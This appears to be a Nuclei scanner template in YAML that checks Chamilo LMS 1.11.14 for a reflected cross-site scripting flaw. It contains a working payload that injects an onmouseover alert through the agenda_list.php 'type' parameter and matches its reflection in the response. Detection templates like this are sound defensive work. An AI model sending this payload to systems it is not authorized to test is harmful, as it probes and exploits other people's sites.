41 lines
1.2 KiB
YAML
41 lines
1.2 KiB
YAML
id: chamilo-lms-xss
|
|
|
|
info:
|
|
name: Chamilo LMS 1.11.14 Cross-Site Scripting
|
|
author: geeknik
|
|
severity: high
|
|
description: Chamilo LMS 1.11.14 is vulnerable to cross-site scripting.
|
|
reference:
|
|
- https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/
|
|
- https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues#Issue-45-2021-01-21-Moderate-impact-moderate-risk-XSS-vulnerability-in-agenda
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
max-request: 1
|
|
tags: xss,chamilo
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'agenda_js.php?type=xss" onmouseover=alert(document.domain)'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
# digest: 4b0a00483046022100ca20c02cc16803fcf1ee590c110aa512b04c7e26424b03948670e6abd7a205e7022100c60bb06d8740c9b7b145b77fe95f4dff3a280f996e1203b168e62f2c10b6bfae:922c64590222798bb761d5b6d8e72950
|